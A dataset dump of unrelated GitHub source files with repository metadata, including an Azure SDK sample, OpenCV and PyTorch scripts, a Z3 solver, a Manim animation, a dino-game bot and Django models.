8bf5c9cb87033d334d26c9436c9f04e4b173ba65 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/kusto/azure-mgmt-kusto/generated_samples/kusto_managed_private_endpoints_check_name_availability.py | 3ccfc9a68d42bd47f54b8ba0ce14082f3885382b | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 1,746 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.kusto import KustoManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-kusto
# USAGE
python kusto_managed_private_endpoints_check_name_availability.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = KustoManagementClient(
credential=DefaultAzureCredential(),
subscription_id="12345678-1234-1234-1234-123456789098",
)
response = client.managed_private_endpoints.check_name_availability(
resource_group_name="kustorptest",
cluster_name="kustoCluster",
resource_name={"name": "pme1", "type": "Microsoft.Kusto/clusters/managedPrivateEndpoints"},
)
print(response)
# x-ms-original-file: specification/azure-kusto/resource-manager/Microsoft.Kusto/stable/2023-05-02/examples/KustoManagedPrivateEndpointsCheckNameAvailability.json
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | Azure.noreply@github.com |
e6f85ea7d60c1bbd053c560d72b230436add4e1e | 0aeddf7f9b47b9b0d66dc00a589b9bcf4409a779 | /reader.py | d149b9b74dc8c972bd12ea0ec40ef96e4f19ddff | [] | no_license | Weird407/seven_segment_reader | 8aa9ec9eb59f0b92a192e592d3a231cb9527522a | 4c797e06cdb7b58d8bb1e2bef7173ed3021d42b2 | refs/heads/master | 2022-12-05T17:24:53.974367 | 2020-08-09T18:49:30 | 2020-08-09T18:49:30 | 286,269,168 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,119 | py | import cv2
import numpy as np
import sys
import os
import csv
import scratch
import find_seven
import select_digit
#input variables
dir_str = 'folder_dir'
outfile = 'out.csv'
#target temp and where the decimals are
target = 100
decimalpos = 1
#For light correction
alpha = 0.6
beta = 5
#For troubleshooting
TroubleShoot= False
#initialize
first = True
Temperature = []
scale = 4
def col2bin(image):
#Lower contrast to correct overlighting
img = cv2.convertScaleAbs(image, alpha=alpha, beta=beta)
#Convert to greyscale
grey = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
#Convert to Binary
thresh = 128
bin_img = cv2.threshold(grey, thresh, 255, cv2.THRESH_BINARY)[1]
return bin_img
def gettemp(data, decim):
T = ""
if data:
for i in np.arange(np.size(data)-decim):
if data[i] != "":
T = T + data[i]
if decim >0:
T=T+"."
for i in np.flip(np.arange(decim))+1:
T = T + data[-i]
return T
#Loop over files in folder
dir = os.fsencode(dir_str)
for filename in os.listdir(dir):
filename = filename.decode("utf-8")
filename = dir_str+"/" + filename
#First figure out useful information
if first:
#Obtain image
image = cv2.imread(filename)
#Obtain cropping region
c = scratch.Cropper(image)
c.crop()
cropcor = c._coords
#Crop
(x1, y1), (x2, y2) = c._coords
cropped = c._image[y1:y2, x1:x2]
#resize
h = scale*np.size(cropped,0)
w = scale*np.size(cropped,1)
cropped2 = cv2.resize(cropped,(w,h))
#Find position of 7 segments, as many as user adds
d = find_seven.finder(cropped2)
d.find_segment()
pos_o = d._coords
#scale down due to scaling
pos = tuple(tuple(int(i / scale) for i in inner) for inner in pos_o)
#Convert to Binary
bin_img = col2bin(cropped)
#Show during checking
if TroubleShoot:
cv2.imshow('binary test',bin_img)
cv2.waitKey(0)
#Read segment values
out = select_digit.read_seg(bin_img,pos)
#Convert to temperature
temp = gettemp(out,decimalpos)
#Save value
#print(temp,type(temp))
Temperature.append(temp)
first = False
else:
#Obtain image
image = cv2.imread(filename)
#Crop
cropped = image[y1:y2, x1:x2]
#Convert to Binary
bin_img = col2bin(cropped)
#Show during checking
if TroubleShoot:
cv2.imshow('binary test',bin_img)
cv2.waitKey(0)
#Read segment values
out = select_digit.read_seg(bin_img,pos)
temp = gettemp(out,decimalpos)
#Save value
#print(temp)
Temperature.append(temp)
#todo: output a file
rows = zip(Temperature)
with open(outfile, "w") as f:
writer = csv.writer(f)
for row in rows:
writer.writerow(row)
| [
"noreply@github.com"
] | Weird407.noreply@github.com |
9c6cc4ccb6bdedbe6825c841e92cc5e2f6db3342 | a731abc2f0ebe0ff1338c764ee093a4a99810069 | /utils/common.py | d9983f69ef93dd00574853089a03f907a1491532 | [] | no_license | Performer941/gitcode | c4db7d8d42c22d2c8791fef3e48d517c29217cb8 | 04d3edd01eb45f76a8d659a322e75fbac1398544 | refs/heads/master | 2023-01-11T11:16:41.227353 | 2020-11-10T06:31:05 | 2020-11-10T06:31:05 | 297,247,309 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 560 | py | def show_top_6_news_style(index):
if index == 1:
return "first"
elif index == 2:
return "second"
elif index == 3:
return "third"
return ""
def show_news_status_name(index):
if index == 0:
return "已通过"
elif index == 1:
return "审核中"
elif index == -1:
return "未通过"
return ""
def show_news_status_style_name(index):
if index == 0:
return "pass"
elif index == 1:
return "review"
elif index == -1:
return "nopass"
return ""
| [
"15815094902@163.com"
] | 15815094902@163.com |
4595a31d07bbb6f2e6c205978e1c9d182a7c6f09 | 20b3c72df77fe5f5c3b5853c625f994c066cdc66 | /examples/reinforce.py | 39777a11f76666ede6bdb67d2d4aed2b46a4ca2f | [] | no_license | batermj/CampX | ae66526a7632dad8bb163c1764c3640cf58a560c | 2246c8a526015bee0340c4a145f07621d46ec79d | refs/heads/master | 2020-04-08T11:50:20.268761 | 2018-11-21T15:13:00 | 2018-11-21T15:13:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,245 | py | import random
import argparse
import sys
import gym
import csv
import time
import numpy as np
from itertools import count
import os
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.autograd import Variable
from torch.distributions import Categorical
# BOAT RACE HELPERS
from boat_race import make_game
from boat_race import step_perf
from boat_race import select_action_preset
from boat_race import all_actions_readable
parser = argparse.ArgumentParser(description='CampX REINFORCE example')
parser.add_argument('--gamma', type=float, default=0.99, metavar='G',
help='discount factor (default: 0.99)')
parser.add_argument('--seed', type=int, default=543, metavar='N',
help='random seed (default: 543)')
parser.add_argument('--render', action='store_true',
help='render the environment')
parser.add_argument('--log_interval', type=int, default=1, metavar='N',
help='interval between training status logs (default: 10)')
parser.add_argument('--max_episodes', type=int, default=100,
help='maximum number of episodes to run')
parser.add_argument('--env_max_steps', type=int, default=100,
help='maximum steps in each episodes to run')
parser.add_argument('--num_runs', type=int, default=5,
help='number of runs to perform')
parser.add_argument('--exp_name_prefix', type=str, default='default_exp_name_prefix',
help='prefix to name of experiment')
parser.add_argument('--verbose', action='store_true',
help='output verbose logging for steps')
parser.add_argument('--action_preset', action='store_true',
help='use preset actions, useful for debugging')
parser.add_argument('--env_boat_race', action='store_true',
help='use boat race environment')
parser.add_argument('--sassy', action='store_true',
help='secret agent in secret environment')
args = parser.parse_args()
class Policy(nn.Module):
def __init__(self, input_size, hidden_size, output_size):
super(Policy, self).__init__()
self.affine1 = nn.Linear(input_size, hidden_size, bias=False)
self.affine2 = nn.Linear(hidden_size, output_size, bias=False)
self.saved_log_probs = []
self.rewards = []
def forward(self, x):
x = self.affine1(x)
x = F.relu(x)
x = self.affine2(x)
action_scores = F.softmax(x, dim=0)
return action_scores
def select_action(state):
if args.env_boat_race:
probs = policy(Variable(state))
m = Categorical(probs)
selected_action = m.sample()
action = torch.Tensor([0,0,0,0,0])
action[selected_action.data] = 1
log_prob = m.log_prob(selected_action)
policy.saved_log_probs.append(log_prob)
else:
state = Variable(torch.from_numpy(state).float())
probs = policy(state)
m = Categorical(probs)
try:
action = m.sample()
except RuntimeError as error:
print(error)
print('m', m, 'probs', probs, 'state', state)
sys.exit(0)
policy.saved_log_probs.append(m.log_prob(action))
return action
def finish_episode():
R = 0
policy_loss = []
rewards = []
for r in policy.rewards[::-1]:
R = r + args.gamma * R
rewards.insert(0, R)
rewards = torch.Tensor(rewards)
rewards = (rewards - rewards.mean()) / (rewards.std() + eps)
for log_prob, reward in zip(policy.saved_log_probs, rewards):
policy_loss.append(-log_prob * reward)
optimizer.zero_grad()
policy_loss = torch.cat(policy_loss).sum()
policy_loss.backward()
optimizer.step()
del policy.rewards[:]
del policy.saved_log_probs[:]
return policy_loss
def main(run_id='default_id', exp_log_file_writer='default_exp_log_file_writer'):
'''Main run code.'''
# Initialize the running reward to track task completion.
ep_rewards = []
total_steps = 0
ep_start_time = time.time()
for i_episode in range(args.max_episodes): # count(1):
if args.env_boat_race:
# Use the boat race interface.
game, board, reward, discount = make_game()
state = board.layered_board.view(-1).float()
# reset the hidden performance measure
ep_performance = 0
ep_performances = []
else:
# Use the standard gym interface
state = env.reset()
# Don't loop forever, add one to the env_max_steps
# to make sure to take the final step
last_time = time.time()
for t in range(env_max_steps):
# increment the global step counter
total_steps += 1
action = select_action(state)
if args.env_boat_race:
# get the agent starting position in ByteTensor shape of env
# adding 0 copies the data to a new object, and is thus
# undisturbed by the performance of the action
location_of_agent_pre = (board.layers['A']+0)
# use a preset action scheme to test the
# env reward calculation and the performance measurement
if args.action_preset:
action = select_action_preset(t)
action_readable = all_actions_readable[np.argmax(list(action))]
# Step through environment using chosen action
board, reward, discount = game.play(action)
state = board.layered_board.view(-1).float()
location_of_agent_post = board.layers['A']
# update the agent performance measure
print(a, b, c, d, location_of_agent_pre, location_of_agent_post)
print(type(a), type(b), type(c), type(d), type(location_of_agent_pre), type(location_of_agent_post))
one_step_performance = step_perf(a, b, c, d, location_of_agent_pre, location_of_agent_post)
ep_performance = ep_performance + one_step_performance
if args.verbose:
print('t(ms): {}, t: {}, a: {}, r: {}, p: {}'.format(
round(1000 * (time.time() - last_time), 2), t, action_readable, reward, one_step_performance))
last_time = time.time()
else:
state, reward, done, _ = env.step(action.data[0])
if args.render and (i_episode % 100 == 0) and not args.env_boat_race:
env.render()
policy.rewards.append(reward)
if not args.env_boat_race:
if done:
break
# collect relevant metrics for reporting
if args.env_boat_race:
ep_rewards.append(np.sum(policy.rewards))
ep_performances.append(ep_performance)
else:
ep_rewards.append(t)
# calculate the policy loss, update the model
# clear saved rewards and log probs
policy_loss = finish_episode()
ep_report_time = round(time.time() - ep_start_time, 2)
ep_start_time = time.time()
# Logging and reporting
if args.env_boat_race:
ep_fields = [run_id, total_steps, ep_report_time,
i_episode, round(policy_loss.data[0],2),
ep_rewards[-1], np.mean(ep_rewards[-5:]),
ep_performances[-1], np.mean(ep_performances)]
exp_log_file_writer.writerow(ep_fields)
if i_episode % args.log_interval == 0:
print('id: {}, t(s): {}, ep: {}, L: {}, R: {:.2f}, R_av_5: {:.2f}, P: {:.2f}, P_av: {:.2f}'.format(
run_id, ep_report_time, i_episode, round(policy_loss.data[0],2),
ep_rewards[-1], np.mean(ep_rewards[-5:]), ep_performances[-1], np.mean(ep_performances)))
else:
if i_episode % args.log_interval == 0:
print('t(s): {}, ep: {}, R: {:.2f}, R_av_5: {:.2f}'.format(
ep_report_time, i_episode, ep_rewards[-1], np.mean(ep_rewards[-5:])))
# calculate a moving average of running rewards
avg_ep_reward = np.mean(ep_rewards)
if avg_ep_reward > reward_threshold:
print("Solved! Running reward is now {} and "
"the last episode runs to {} time steps!".format(avg_ep_reward, t))
break
if __name__ == '__main__':
# Select and define the environment
if not args.env_boat_race:
env = gym.make('CartPole-v0')
env.seed(args.seed)
reward_threshold = env.spec.reward_threshold
input_size = 4
output_size = 2
env_max_steps = 10000
else:
game, board, reward, discount = make_game()
input_size = board.layered_board.view(-1).shape[0]
output_size = 5
env_max_steps = args.env_max_steps
reward_threshold = 30 # env.spec.reward_threshold
if args.sassy:
import syft as sy
hook = sy.TorchHook(verbose=True)
me = hook.local_worker
me.is_client_worker = True
bob = sy.VirtualWorker(id="bob", hook=hook, is_client_worker=False)
alice = sy.VirtualWorker(id="alice", hook=hook, is_client_worker=False)
james = sy.VirtualWorker(id="james", hook=hook, is_client_worker=False)
me.add_worker(bob)
me.add_workers([bob, alice])
bob.add_workers([alice])
alice.add_workers([bob])
james.add_workers([me, bob, alice])
# build shared views for the board
# named a,b,c,d
a = torch.zeros(5,5).long()
a[1, 2] = 1
a[3, 2] = 1
# print('a', a)
b = torch.zeros(5,5).long()
b[1, 3] = 1
b[3, 1] = 1
# print('b', b)
c = a.t()
# print('c', c)
d = torch.zeros(5,5).long()
d[1, 1] = 1
d[3, 3] = 1
# print('d', d)
# share the environment
game, board, reward, discount = make_game()
game.share(bob, alice)
a = a.share(bob, alice)
b = b.share(bob, alice)
c = c.share(bob, alice)
d = d.share(bob, alice)
eps = np.finfo(np.float32).eps.item()
# Build an output file for processing results
logging_dir = 'logs/'
if not os.path.exists(logging_dir):
os.makedirs(logging_dir)
with open('logs/'+args.exp_name_prefix +
'_n{}_steps{}_eps{}_gamma{}_sassy{}'.format(args.num_runs,
args.env_max_steps,
args.max_episodes,
args.gamma,
int(args.sassy)) +'.csv', mode='w') as exp_log_file:
# write the header row
fieldnames = ['id', 'step', 't(s)', 'ep', 'L', 'R', 'R_av_5', 'P', 'P_av']
exp_log_file_writer = csv.writer(exp_log_file, delimiter=',',
quotechar='"', quoting=csv.QUOTE_MINIMAL)
exp_log_file_writer.writerow(fieldnames)
for run_id in range(args.num_runs):
# Manually set the random seed for Torch
torch.manual_seed(args.seed + (run_id * random.randint(1, args.seed)))
hidden_size = 32
learning_rate = 1e-2
policy = Policy(input_size=input_size,
hidden_size=hidden_size,
output_size=output_size)
optimizer = optim.Adam(policy.parameters(),
lr=learning_rate)
# Share the weight data with campx sassy protocol
if args.env_boat_race and args.sassy:
W = policy.affine1.weight.data
W = W.fix_precision().share(bob, alice)
W2 = policy.affine2.weight.data
W2 = W2.fix_precision().share(bob, alice)
main(run_id=str(run_id), exp_log_file_writer=exp_log_file_writer) | [
"korymath@google.com"
] | korymath@google.com |
4a44f30e7234d05326d59edc14ee988f60ce1cf7 | 3a46b5fb48201507a962944ddb4fe7d7c891f1b2 | /strokesort.py | 2f52035897fbd7827afd99ff76cc63832a71cf7f | [] | no_license | OllieMBM/LROverlay | 2bdf8a09d446dd78218f1726b44357692429d93c | 2bd6e17a8a024fe44148ec8fe8cfcd388aad9730 | refs/heads/master | 2020-05-02T10:12:17.167216 | 2019-04-19T10:32:21 | 2019-04-19T10:32:21 | 177,890,998 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,115 | py | from random import *
from PIL import Image, ImageDraw, ImageOps
from util import *
def sortlines(lines):
print("optimizing stroke sequence...")
clines = lines[:]
slines = [clines.pop(0)]
while clines != []:
x,s,r = None,1000000,False
for l in clines:
d = distsum(l[0],slines[-1][-1])
dr = distsum(l[-1],slines[-1][-1])
if d < s:
x,s,r = l[:],d,False
if dr < s:
x,s,r = l[:],s,True
clines.remove(x)
if r == True:
x = x[::-1]
slines.append(x)
return slines
def visualize(lines):
import turtle
wn = turtle.Screen()
t = turtle.Turtle()
t.speed(0)
t.pencolor('red')
t.pd()
for i in range(0,len(lines)):
for p in lines[i]:
t.goto(p[0]*640/1024-320,-(p[1]*640/1024-320))
t.pencolor('black')
t.pencolor('red')
turtle.mainloop()
if __name__=="__main__":
import linedraw
#linedraw.draw_hatch = False
lines = linedraw.sketch("Lenna")
#lines = sortlines(lines)
visualize(lines)
| [
"noreply@github.com"
] | OllieMBM.noreply@github.com |
937a4be3329f93a1d8831852a43f326e18a8929f | c7ffba3213c9fc8267bc27d1b6d1dbfac35ef980 | /tensorflow_encrypted/player/__main__.py | 79e29b785cca05295c76efd1f9ae744105064b57 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | jvmncs/tf-encrypted | b2ac47176ee86d534456f85e71905db1badea512 | 5b0ac035b64b8de41a54779da56a496014caf583 | refs/heads/master | 2022-01-04T23:57:32.626529 | 2018-09-18T18:57:54 | 2018-09-18T18:57:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 667 | py | from ..config import RemoteConfig
if __name__ == '__main__':
import argparse
import tensorflow_encrypted as tfe
parser = argparse.ArgumentParser(description="Run a tf-encrypted player")
parser.add_argument('name', metavar='NAME', type=str, help='name of player as specified in the config file')
parser.add_argument('--config', metavar='FILE', type=str, help='path to configuration file', default='./config.json')
args = parser.parse_args()
config = tfe.config.load(args.config)
# pylint: disable=E1101
if isinstance(config, RemoteConfig):
server = config.server(args.name)
server.start()
server.join()
| [
"noreply@github.com"
] | jvmncs.noreply@github.com |
4cf0c6c0adb228ba8a653b2c0ff7e3085e3351bd | ab124df80f241ee4634041a5110553c603a7c168 | /flask_app/Env2Pytorch/Trainer.py | c2fa5adf3d2d32eceec6eec010170ef7abaec5a1 | [] | no_license | thibaultdalmon/RecommenderSystem | 8a07b2f5a0ffff53a421d7a7b06c1837b2bd4417 | 9f2bad06ceb2451977873d77aa50e33b2f2fc518 | refs/heads/master | 2020-04-20T01:11:25.572272 | 2019-02-27T21:49:04 | 2019-02-27T21:49:04 | 168,538,659 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,224 | py | from Env2Pytorch.SiameseNetwork import SiameseNetwork
from Env2Pytorch.Generator import DataGenerator, collate_data_pos_neg, Data, collate_data
import torch
from torch.optim import Adam
from torch.nn import MarginRankingLoss
from torch.utils.data import DataLoader, WeightedRandomSampler
class Trainer:
def __init__(self, interface, learning_rate=3e-4, batch_size=32, margin=10, num_samples=100, user_embedding_dim=10,
item_embedding_dim=10, user_meta_dim=15, item_meta_dim=15, meta_meta_dim=30, dense_1_dim=32,
dense_2_dim=15, dropout=0.5):
self.interface = interface
self.margin = margin
self.learning_rate = learning_rate
self.user_embedding_dim = user_embedding_dim
self.item_embedding_dim = item_embedding_dim
self.user_meta_dim = user_meta_dim
self.item_meta_dim = item_meta_dim
self.meta_meta_dim = meta_meta_dim
self.dense_1_dim = dense_1_dim
self.dense_2_dim = dense_2_dim
self.dropout = dropout
self.network = SiameseNetwork(interface, user_embedding_dim=self.user_embedding_dim,
item_embedding_dim=item_embedding_dim, user_meta_dim=user_meta_dim,
item_meta_dim=item_meta_dim, meta_meta_dim=meta_meta_dim, dense_1_dim=dense_1_dim,
dense_2_dim=dense_2_dim, dropout=dropout)
self.dataset = DataGenerator(interface.state_history, interface.rewards_history, interface.action_history)
self.batch_size = batch_size
self.num_samples = num_samples
self.loss = MarginRankingLoss(margin=margin, reduction='none')
self.optimizer = Adam(self.network.parameters(), lr=learning_rate)
def reset(self, n):
self.network = SiameseNetwork(self.interface, user_embedding_dim=self.user_embedding_dim,
item_embedding_dim=self.item_embedding_dim, user_meta_dim=self.user_meta_dim,
item_meta_dim=self.item_meta_dim, meta_meta_dim=self.meta_meta_dim,
dense_1_dim=self.dense_1_dim, dense_2_dim=self.dense_2_dim, dropout=self.dropout)
self.dataset = DataGenerator(self.interface.state_history, self.interface.rewards_history,
self.interface.action_history)
self.loss = MarginRankingLoss(margin=self.margin, reduction='none')
self.optimizer = Adam(self.network.parameters(), lr=self.learning_rate)
self.train(n)
def train(self, n=1):
for _ in range(n):
weights = [data.weight for data in self.dataset]
sampler = WeightedRandomSampler(weights=weights, num_samples=self.num_samples, replacement=True)
data_loader = DataLoader(self.dataset, batch_size=self.batch_size, sampler=sampler,
collate_fn=collate_data_pos_neg, drop_last=True)
self.network.train()
for inputs in data_loader:
self.optimizer.zero_grad()
output_pos = self.network(inputs['user_id_pos'], inputs['item_id_pos'], inputs['metadata_pos'])
output_neg = self.network(inputs['user_id_neg'], inputs['item_id_neg'], inputs['metadata_neg'])
loss = self.loss(output_pos, output_neg, torch.ones(output_pos.shape))
for j, data in enumerate(inputs['raw_data']):
data.weight = loss[j][0].item()
loss = loss.mean()
loss.backward()
self.optimizer.step()
def online(self, n=1):
self.network.eval()
l = []
my_state = self.interface.next_state
for m in self.interface.next_state:
data = Data(m[0], m[1], m[2:])
l.append(data)
inputs = collate_data(l)
output = self.network(inputs['user_id'], inputs['item_id'], inputs['metadata']).squeeze()
recommended_item = output.argmax().item()
state, reward = self.interface.predict(recommended_item)
self.dataset.add_data(my_state, recommended_item, reward)
self.train(n=n)
return reward
| [
"emmanuel.goutierre@mac.com"
] | emmanuel.goutierre@mac.com |
f9149adc1d138f483eb14838fe57cbf12e65eec4 | 5de5ae0adb6fb1e73c2e897fbc13b6abf53c559b | /Applications/Equations/knapsack-1.py | 98dc10ab696f6baaedba79c8b32dbe93669eedb8 | [] | no_license | Trietptm-on-Coding-Algorithms/Learning-Z3 | af935450226ee3299e10361f21a567945aa0fd5c | c5ef7faca49aa164556b3c7e9ccfb4709027cf74 | refs/heads/master | 2020-05-13T18:34:38.105308 | 2017-12-23T11:08:43 | 2017-12-23T11:08:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,109 | py | # Solving knapsack problem with Z3
#
# Use:
# python knapsack.py
#
from z3 import *
# from https://www.xkcd.com/287/
fruits, fries, salad, wings, sticks, plate = Ints('fruits fries salad wings sticks plate')
s = Solver()
s.add(fruits>=0, fries>=0, salad>=0, wings>=0, sticks>=0, plate>=0)
s.add(215*fruits + 275*fries + 225*salad + 355*wings + 420*sticks + 580*plate == 1505)
result = []
while s.check() == sat:
m = s.model()
print(m)
result.append(m)
# Create new constraint the blocks the current model
block = []
for el in m:
# el is a declaration
if el.arity() > 0:
raise Z3Exception("uninterpreted function are not supported")
# Create a constant from declaration
obj = el()
if is_array(obj) or obj.sort().kind() == Z3_UNINTERPRETED_SORT:
raise Z3Exception("arrays and uninterpreted sorts are not supported")
block.append(obj != m[el])
s.add(Or(block))
print(len(result))
# https://stackoverflow.com/questions/141779/solving-the-np-complete-proble | [
"me@xathrya.id"
] | me@xathrya.id |
76648c1719437d1cca16d3f5e6dee46b6f6cbab5 | e8201f803bb23a1b9a3eab9fc0fc9b1709e65d2e | /examples/readme_example/convolutional_neural_network_with_images.py | 56eb89da6db0a88cc9529e3b8d07bb8623575244 | [
"MIT"
] | permissive | helblazer811/ManimML | 20bc3548ceab75745a8d8088929fec51057e130f | 5df233ea90aba16611d29c6a4b7717eb08ae7e09 | refs/heads/main | 2023-08-09T07:50:38.605540 | 2023-07-22T02:43:52 | 2023-07-22T02:43:52 | 454,906,591 | 1,339 | 73 | MIT | 2023-04-11T02:22:49 | 2022-02-02T19:26:55 | Python | UTF-8 | Python | false | false | 1,185 | py | from manim import *
from PIL import Image
import numpy as np
from manim_ml.neural_network import (
Convolutional2DLayer,
FeedForwardLayer,
NeuralNetwork,
ImageLayer,
)
# Make the specific scene
config.pixel_height = 700
config.pixel_width = 1900
config.frame_height = 7.0
config.frame_width = 7.0
class CombinedScene(ThreeDScene):
def construct(self):
# Make nn
image = Image.open("../../assets/mnist/digit.jpeg")
numpy_image = np.asarray(image)
# Make nn
nn = NeuralNetwork(
[
ImageLayer(numpy_image, height=1.5),
Convolutional2DLayer(1, 7, filter_spacing=0.32),
Convolutional2DLayer(3, 5, 3, filter_spacing=0.32),
Convolutional2DLayer(5, 3, 3, filter_spacing=0.18),
FeedForwardLayer(3),
FeedForwardLayer(3),
],
layer_spacing=0.25,
)
# Center the nn
nn.move_to(ORIGIN)
self.add(nn)
# Play animation
forward_pass = nn.make_forward_pass_animation()
self.play(ChangeSpeed(forward_pass, speedinfo={}), run_time=10)
self.wait(1)
| [
"alechelbling1@gmail.com"
] | alechelbling1@gmail.com |
0145502ae27b1857fbbc4bfe35266ed6fb8cc781 | cd357fade47e9e6bd2bb20cb56a9a917ffa02b65 | /12. Django Level One - Basic/first_project/first_app/models.py | 9a7097a3f85f45d3f324bf68b85f713a88295ad8 | [] | no_license | sys-ryan/python-django-fullstack-bootcamp | 7ec89571b5c0bda48733ddca2a4d56e21cbfb2f4 | 7592966e6450fbe3d7b81d59d4c1116c2d882a03 | refs/heads/main | 2023-02-05T08:50:38.850492 | 2020-12-27T08:18:33 | 2020-12-27T08:18:33 | 316,863,692 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 626 | py | from django.db import models
# Create your models here.
class Topic(models.Model):
top_name = models.CharField(max_length=264, unique=True)
def __str__(self):
return self.top_name
class Webpage(models.Model):
topic = models.ForeignKey(Topic, on_delete=models.CASCADE)
name = models.CharField(max_length=264, unique=True)
url = models.URLField(unique=True)
def __str__(self):
return self.name
class AccessRecord(models.Model):
name = models.ForeignKey(Webpage, on_delete=models.CASCADE)
date = models.DateField()
def __str__(self):
return str(self.date)
| [
"sys.ryan0902@gmail.com"
] | sys.ryan0902@gmail.com |
5b554006c6a01ce73dace158e660e50bc655ea26 | 9f44a4da4bac9d986efa028364f81d8818d6beee | /Examples/Python/B-main.py | 3c8453e82b5f8b16cb61b85aaac5d99d5a014487 | [] | no_license | kempy007/GoDinoBot | 2ee0260ad6370544095ada7ebf0c9834f09cdaa1 | 92289c1bd5e0aef2206b73796f8c2f12a3d97f9a | refs/heads/main | 2023-03-28T00:51:25.352833 | 2021-03-31T13:29:32 | 2021-03-31T13:29:32 | 339,737,304 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,785 | py | import cv2
import numpy as np
from PIL import ImageGrab # windows and mac
# import pyscreenshot as ImageGrab # linux
import ctypes
# import os # for linux key press
# bbox = (450, 230, 500, 265) fix
# bbox = (Left, Top, Right, Bottom)
#bbox = (965, 240, 1925, 500) ## fullgame not required need to be smaller focus area
bbox = (1200, 400, 1270, 435) # ROI infront of dino
shape = (bbox[3]-bbox[1], bbox[2]-bbox[0], 3)
bg = 255
ref_frame = np.full(shape, bg)
i = 1
while True:
# capturing the frame.
img = ImageGrab.grab(bbox)
frame = np.array(img)
cv2.imshow("frame", frame)
# updating the reference frame with the background change.
# toggling between white frame and black frame.
if bg != frame[0][0][0]:
bg = frame[0][0][0]
ref_frame = np.full(shape, bg)
i += 1
# comparing the captured frame and reference frame.
frame_diff = np.subtract(ref_frame, frame).sum()
# if frames aren't the same, obstacle detected and jump.
if frame_diff != 0:
ctypes.windll.user32.keybd_event(0x20, 0, 0, 0) # Space is down
# os.system('xdotool key space') # for linux
# updating the frame capture region to adapt with the increasing speed.
if i % 4 == 0:
bbox = (bbox[0]+1, bbox[1], bbox[2]+1, bbox[3])
shape = (bbox[3]-bbox[1], bbox[2]-bbox[0], 3)
ref_frame = np.full(shape, bg)
print(f"update {i}")
i += 1
# listen for ESC key to exit.
if cv2 .waitKey(1) == 27: # when ESC is pressed
break
cv2.destroyAllWindows()
| [
"martyn.kemp@fedex.com"
] | martyn.kemp@fedex.com |
93a0eb840fa8fc830723313a1c68008955196626 | 2f468b6c7526f3be2865dafe52f49e51ea4758e0 | /Basic Data Structure/นับตัวอักษรจากข้อความที่ผู้ใช้ป้อนให้จนกว่าจะได้รับข้อความว่า 'end'.py | bd47fa7ef4a3139ea9994e338f2feba4f57497e5 | [] | no_license | iceman951/Intro-Python-with-Sadhu-Coding-system | 0db07aa61bc12128c743b61ea57a9092de5ab0b0 | 501e1c3349ce1c071b589a46a3e64b427b0b91ac | refs/heads/master | 2022-12-14T22:33:57.208009 | 2020-09-11T15:12:50 | 2020-09-11T15:12:50 | 294,337,271 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 636 | py | counts = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
text = ''
sentence =''
while True:
text = input('Enter string: ').strip().lower()
if text == 'end': break
else: sentence += text
for i in range(len(sentence)):
if sentence[i] >= 'a' and sentence[i] <= 'z':
index = ord(sentence[i]) -97
counts[index] += 1
print('''******************************
* Alphabet Counting *
******************************''')
for i in range(len(counts)):
if counts[i] > 0:
character = chr(ord('a') + i)
print(character,counts[i])
print('******************************') | [
"noreply@github.com"
] | iceman951.noreply@github.com |
72f2a2f8488c5accfd2e8dc40590cc94d1e9616d | a7e8d2748b6ccf0e71140ff4659165eb527e8aa8 | /ORM_INTRO_DEMO/apps/read/views.py | 45af7cc13b16742b91988ff0c7dafea6499602a7 | [] | no_license | cuixiaozhao/ORM_LOOKUP_DEMO | 77fb96d73365aba46f73a6f32f7aa1d853a4574a | cbfafde42e1f6726773db9ac3257c103deabc736 | refs/heads/master | 2020-04-12T13:31:59.667741 | 2018-12-20T05:57:02 | 2018-12-20T05:57:02 | 162,524,716 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 95 | py | from django.shortcuts import render
# Create your views here.
def read_view(request):
pass | [
"tqtl@tqtl.org"
] | tqtl@tqtl.org |
